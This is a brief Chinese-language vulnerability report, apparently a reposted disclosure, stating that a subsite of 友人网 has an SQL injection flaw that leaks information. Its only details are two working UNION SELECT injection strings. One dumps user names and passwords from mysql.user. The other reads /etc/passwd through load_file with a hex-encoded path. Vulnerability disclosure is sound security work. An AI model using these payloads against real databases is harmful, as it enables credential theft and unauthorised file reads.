友人网分站存在sql注入导致部分信息泄露
详细说明:?page=23&id=-44596+uNioN+alL+sEleCT+1,2,3,concat(user,0x3a,password),5,6 from mysql.user limit 2,1--
?page=23&id=-44596+uNioN+alL+sEleCT+1,2,3,load_file(0x2f6574632f706173737764),5,6--
作者 Calm.
,www.xuhantao.com,涛涛电脑知识网